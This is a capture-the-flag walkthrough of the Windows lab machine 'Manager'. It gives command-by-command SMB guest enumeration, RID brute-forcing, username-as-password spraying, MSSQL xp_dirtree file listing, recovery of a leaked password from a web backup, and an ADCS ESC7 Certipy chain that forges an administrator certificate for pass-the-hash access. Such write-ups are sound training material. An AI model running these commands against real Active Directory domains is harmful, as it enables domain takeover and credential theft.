Manager
(Windows , Medium)
OVERVIEW
So Like always we got our IP Address so now let’s scan it using NMAP
ENUMERATION
So we have lot of ports so let’s enumerate each one of them one by one but don’t forget to add the Domain and DC name in your /etc/hosts file
Let’s start from Port 80 http website
I enumerated the webpage , tried finding directories , subdomains but didn’t got anything so let’s move on to the SMB service now and check Guest Login
nxc smb 10.129.53.136 -u guest -p ''
nxc smb 10.129.53.136 -u guest -p '' --shares
We successfully got the guest login and shares but none of them are of any use to us so now let’s try RID Cycling using --rid-brute to find users, groups etc
nxc smb 10.129.53.136 -u guest -p '' --rid-brute
There we go we got the users so let’s save them in a file named as users.txt
administrator
guest
krbtgt
dc01$
zhong
cheng
ryan
raven
jinWoo
chinHae
operator
Now there is a chance that the user is using its username as password so let’s try SMB bruteforce to check it
nxc smb 10.129.53.136 -u users.txt -p users.txt --continue-on-success --no-bruteforce
We got the user operator
I checked its shares permission and other services even bloodhound data but didn’t got anything useful so Now let’s try this user in MSSQL service
EXPLOITATION
mssqlclient.py manager.htb/operator:operator@manager.htb -dc-ip 10.129.53.136 -windows-auth
And it worked now let’s enumerate it.
On enumerating i found xp_dirtree command which is used to read file system directory let’s try it
EXEC XP_DIRTREE 'C:\' ,1, 1;
As you can see we can see the directories , now let’s try seeing the website directory as something might be there as we didn’t got anything useful from outside enumeration
EXEC XP_DIRTREE 'C:\inetpub\wwwroot' ,1, 1;
we can see a backup zip which might have some info so we can get it directly from the website
wget http://manager.htb/website-backup-27-07-23-old.zip
After unzipping the file we can see a .old-conf.xml file which might have something useful so let’s see it
And here we go we got the user Raven Password which we can use to get an Evil-winrm shell
USER FLAG
And we are in as Raven and now you can get the user flag
PRIVILEGE ESCALATION
Now for escalating privileges i decided to check for ADCS vulnerabilities so let’s run Certipy to find if there is any vuln or not (Certipy should be UpToDate )
certipy find -u raven -p 'REDACTED' -dc-ip 10.129.53.136 -vulnerable -stdout
And here we go we found ESC 7 vulnerability and Raven user have ManageCa rights as well as Enrollment Rights but don’t have Manage Certificate rights so let’s use ManageCa rights to grant Raven the rights
certipy ca -u Raven -p 'REDACTED' -dc-ip 10.129.53.136 -ca "manager-DC01-CA" -add-officer Raven
Now we can enable SubCA Template (Even if its already enabled still do it )
certipy ca -u Raven -p 'REDACTED' -dc-ip 10.129.53.136 -ca "manager-DC01-CA" -enable-template SubCA
Since SubCA template is now enabled let’s get the request id of the certificate which we need to issue by requesting certificate for administrator@manager.htb upn and don’t forget to save the key by pressing y
certipy req -u Raven -p 'REDACTED' -dc-ip 10.129.53.136 -ca "manager-DC01-CA" -template SubCA -upn administrator@manager.htb
So we got out request id which is 20 so now let’s issue certificate to this ID (Enter your REQ ID below instead of 20)
certipy ca -u Raven -p 'REDACTED' -dc-ip 10.129.53.136 -ca "manager-DC01-CA" -issue-request 20
As you can see the certificate is successfully issued to the request ID now the only thing is left to retrieve it and get the administrator.pfx
certipy req -u Raven -p 'REDACTED' -dc-ip 10.129.53.136 -ca "manager-DC01-CA" -retrieve 20
As you can see we got the administrator.pfx Now we can use it to get the administrator hash
certipy auth -pfx administrator.pfx -dc-ip 10.129.53.136 -domain manager.htb
If it show error regarding Clock Skew is too great do
sudo ntpdate 10.129.53.136
Now run the above command again
We will get the administrator hash now we can use it to get an evil-winrm session
ROOT FLAG
Now you can grab the root flag and solve the machine
WE FINALLY DID IT !!!! CHALLENGE SOLVED !!
For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com
THANKS FOR READING !!!
